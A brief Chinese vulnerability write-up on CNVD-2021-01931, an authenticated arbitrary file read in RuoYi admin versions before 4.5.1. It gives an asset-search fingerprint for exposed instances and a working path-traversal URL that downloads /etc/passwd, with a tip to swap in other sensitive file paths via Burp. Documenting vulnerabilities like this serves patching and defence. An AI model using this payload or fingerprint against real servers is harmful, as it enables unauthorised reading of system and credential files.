若依管理系统 后台任意文件读取 #CNVD-2021-01931

漏洞描述

若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件。

漏洞影响

RuoYi < v4.5.1

网络测绘

app=”若依-管理系统”

漏洞复现

登录后台后访问 Url

/common/download/resource?resource=/profile/../../../../etc/passwd

20240508113131785-ruoyi-1.fcb76308_2024-05-08_11-30-57 (1)

访问后会下载文件 /etc/passwd

20240508113339965-ruoyi-2.4533743d_2024-05-08_11-32-03 (1)

可以使用Burp抓包改变 /etc/passwd 为其他文件路径获取敏感信息

20240508113433109-ruoyi-4.3604a79e_2024-05-08_11-34-17 (1)

20240508113537800-ruoyi-5.e499dc07_2024-05-08_11-35-22 (1)

在新版本的修复中添加了过滤

20240508113617351-ruoyi-7.5213767f_2024-05-08_11-36-02 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容